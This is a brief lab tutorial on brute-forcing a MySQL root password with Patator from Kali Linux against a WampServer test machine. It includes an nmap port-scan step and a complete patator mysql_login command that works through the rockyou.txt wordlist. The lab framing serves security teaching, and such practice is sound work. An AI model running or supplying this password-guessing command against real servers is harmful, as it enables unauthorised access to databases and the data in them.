Bruteforcing MySQL with Patator -

Requirement

WampServer
Kali Linux &
Basic understanding of nmap commands


To learn this you need to first install WampServer on your lab machine.

After installing ping the system where you have installed WampServer from the Kali machine and see whether it is reachable

or not.

Nmap the Windows machine to see if the port 3306 is open. Port 3306 is used my MySQL and MySQL is include in WampServer

hence we installed WampServer

The command include:


nmap IP_address_here (Eg: nmap 192.168.2.14)


Switch to Kali Linux and open a terminal:

On terminal write the following:


patator

patator mysql_login user=root password=FILE0 0=/root/Desktop/rockyou.txt host=IP_address_of_machine_running_Wamp –x

ignore:fgrep=’Access denied for user’
